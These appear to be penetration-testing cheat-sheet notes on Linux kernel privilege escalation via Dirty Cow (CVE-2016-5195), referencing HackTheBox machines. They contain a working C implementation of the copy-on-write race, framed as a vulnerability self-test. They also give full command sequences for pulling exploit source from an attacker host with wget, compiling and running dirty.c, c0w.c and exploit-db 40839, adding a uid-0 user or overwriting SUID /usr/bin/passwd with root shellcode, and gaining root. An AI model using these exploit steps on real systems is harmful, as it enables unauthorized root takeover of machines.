# 4 Kernel Exploits

| Family                  | CVE / Notes                                                                                   | Versions                                                                                                                                                                 |
| ----------------------- | --------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| [Dirty Cow](#dirty-cow) | <p>CVE-2016-5195</p><p>Effective but unsafe: it is a race condition and can crash the target</p> | <p>Kernels from 2.6.22 (2007) up to the October 2016 fixes</p><p>Confirmed on: Kernel 3.2.0 / Ubuntu 12.04 (2012-2014), Debian 2.6.32</p> |

## Version

```
uname -a       ..2011/2012 kernel (e.g. 3.2.0) should be vuln to Dirty Cow
uname -a       ..debian 2.6.32  - vulnerable
               ..distros backport fixes, so the version string is only a hint: confirm with exploit-suggester or a PoC
```

## Linux Versions

* <https://wiki.ubuntu.com/Releases>

## Linux-Exploit-Suggester-2

```
---------------
https://github.com/jondonas/linux-exploit-suggester-2
python -m SimpleHTTPServer 4444                        ..attacker box: serve the script
wget http://$IP:4444/linux-exploit-suggester-2.pl      ..target: fetch it (same port as the server)

---------------
linux-exploit-suggester-2.pl -k 2.6.32          ..local: check a given kernel version, no target access needed
./linux-exploit-suggester-2.pl                  ..remote: run on the target, reads uname itself
```

## Dirty Cow

* [https://dirtycow.ninja](https://dirtycow.ninja/)
* Dirty COW is a privilege escalation vulnerability which exploits a race condition in the way the Linux kernel’s memory subsystem handles the copy-on-write (COW) breakage of private read-only memory mappings.
* On dirtycow.ninja: Download > scroll to the bottom > pick the most recent maintained PoC (ex: FireFart's dirty.c, /etc/passwd method)
* REF: beepHTB, valentineHTB, lameHTB
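Before running a root exploit on a box, it is worth knowing whether the kernel is actually vulnerable, since the version string alone (see "Version" above) is unreliable on distros that backport fixes. The added self-test below, which is not part of the original notes or of any of the linked PoCs, exercises the exact race described above in a harmless way: it maps a file it created itself read-only and MAP_PRIVATE, then races a write through `/proc/self/mem` against `madvise(MADV_DONTNEED)`. On a patched kernel the write only ever lands in the process's private COW copy and the file on disk is unchanged; on a vulnerable kernel the bytes reach the page cache and the file content changes. The file path, the strings and the round count are constructed for the example.

```c
#define _GNU_SOURCE
#define _FILE_OFFSET_BITS 64
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* Constructed content for the example. Same length so the file size never changes. */
static const char ORIGINAL[] = "dirtycow self-test: this text must survive\n";
static const char PAYLOAD[]  = "dirtycow self-test: kernel is VULNERABLE!!\n";

struct race {
    void *map;    /* private, read-only mapping of the test file */
    size_t len;
    int memfd;    /* /proc/self/mem */
    long rounds;
};

/* Thread 1: keep discarding the private COW copy of the page. */
static void *madvise_thread(void *arg) {
    struct race *r = arg;
    for (long i = 0; i < r->rounds; i++)
        madvise(r->map, r->len, MADV_DONTNEED);
    return NULL;
}

/* Thread 2: keep writing the payload at the mapping's address via /proc/self/mem.
 * On a patched kernel this always breaks COW into a private page first. */
static void *write_thread(void *arg) {
    struct race *r = arg;
    for (long i = 0; i < r->rounds; i++)
        (void)pwrite(r->memfd, PAYLOAD, sizeof PAYLOAD - 1, (off_t)(uintptr_t)r->map);
    return NULL;
}

/* Create the target file with known content and make it read-only. 0 on success. */
int write_original(const char *path) {
    unlink(path);  /* a previous 0444 copy would block O_WRONLY for a non-root owner */
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) return -1;
    ssize_t n = write(fd, ORIGINAL, sizeof ORIGINAL - 1);
    close(fd);
    if (n != (ssize_t)(sizeof ORIGINAL - 1)) return -1;
    return chmod(path, 0444);
}

/* 1 if the file's bytes equal `expected`, 0 if not, -1 on I/O error. */
int file_matches(const char *path, const char *expected) {
    char buf[256] = {0};
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    ssize_t n = read(fd, buf, sizeof buf - 1);
    close(fd);
    if (n < 0) return -1;
    return (size_t)n == strlen(expected) && memcmp(buf, expected, (size_t)n) == 0;
}

/* Run the race for `rounds` iterations. Returns 1 if the write reached the file on
 * disk (CVE-2016-5195 present), 0 if the file is unchanged, -1 on setup error. */
int dirtycow_test(const char *path, long rounds) {
    if (write_original(path) < 0) return -1;
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) < 0) { close(fd); return -1; }
    struct race r = { .len = (size_t)st.st_size, .rounds = rounds };
    r.map = mmap(NULL, r.len, PROT_READ, MAP_PRIVATE, fd, 0);
    if (r.map == MAP_FAILED) { close(fd); return -1; }
    r.memfd = open("/proc/self/mem", O_RDWR);
    if (r.memfd < 0) { munmap(r.map, r.len); close(fd); return -1; }

    pthread_t t[2];
    void *(*fn[2])(void *) = { madvise_thread, write_thread };
    int started = 0;
    for (int i = 0; i < 2; i++, started++)
        if (pthread_create(&t[i], NULL, fn[i], &r) != 0) break;
    for (int i = 0; i < started; i++) pthread_join(t[i], NULL);
    close(r.memfd);
    munmap(r.map, r.len);
    close(fd);
    if (started != 2) return -1;

    int same = file_matches(path, ORIGINAL);  /* re-read from the page cache */
    return same < 0 ? -1 : !same;
}

int main(int argc, char **argv) {
    const char *path = argc > 1 ? argv[1] : "/tmp/dirtycow_selftest";
    long rounds = argc > 2 ? atol(argv[2]) : 1000000L;  /* more rounds = more confidence */
    int res = dirtycow_test(path, rounds);
    unlink(path);
    if (res < 0) { perror("dirtycow_test"); return 2; }
    puts(res ? "VULNERABLE: write to a private read-only mapping reached the file"
             : "not vulnerable (or race not won in this many rounds)");
    return res;
}
```

Compile with `gcc -pthread dirtycow_test.c -o dirtycow_test` and run it as an unprivileged user on the target; a "not vulnerable" result after a few million rounds means the full exploits above will not work and are not worth the crash risk. The same race, aimed at `/etc/passwd` or at a SUID binary instead of a scratch file, is what dirty.c and c0w.c do.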

```
dirty.c
https://github.com/FireFart/dirtycow/blob/master/dirty.c
git clone https://gist.github.com/e9d4ff65d703a9084e85fa9df083c679.git
python -m SimpleHTTPServer 4444                ..attacker box
wget http://10.10.14.6:4444/dirty.c            ..target (same port as the server)

gcc -pthread dirty.c -o dirty -lcrypt
chmod +x dirty
./dirty newpassword          ..or run ./dirty and type the new password at the prompt
                             ..backs up /etc/passwd to /tmp/passwd.bak, then adds uid-0 user 'firefart'
su firefart                  ..root privs!
mv /tmp/passwd.bak /etc/passwd   ..cleanup: restore the original /etc/passwd
```

## Dirty c0w (SUID /usr/bin/passwd method)

```
--------------------------------
uname -a                                       ..debian 2.6.32
searchsploit linux kernel 2.6.32 priv esc      ..some
searchsploit linux kernel 2.6 debian priv esc  ..nada
linux-exploit-suggester-2.pl -k 2.6.32         ..'dirty cow'

cat c0w.c                                      ..download/view
gcc -pthread c0w.c -o c0w                      ..compile
./c0w                                          ..exploit: backs up /usr/bin/passwd to /tmp/bak, overwrites it with root shellcode
/usr/bin/passwd                                ..run the patched SUID binary -> root shell
whoami                                         ..root
cp /tmp/bak /usr/bin/passwd                    ..cleanup! restore passwd or nobody can change passwords
```

## 40839

* <https://www.exploit-db.com/exploits/40839>

```
uname -a                                     ..linux 2.6.24
searchsploit linux kernel 2.6.24 priv esc    ..search

searchsploit -m 40839.c                      ..copy (this is FireFart's /etc/passwd method)
python -m SimpleHTTPServer 4444              ..transfer
wget http://$MyIP:4444/40839.c               ..get
gcc -pthread 40839.c -o 40839 -lcrypt        ..compile
./40839 newpassword                          ..execute: adds uid-0 user 'firefart' with that password
su firefart                                  ..win (root's own password is untouched, so 'su -' will not work)
mv /tmp/passwd.bak /etc/passwd               ..cleanup: restore the backup the exploit made
```
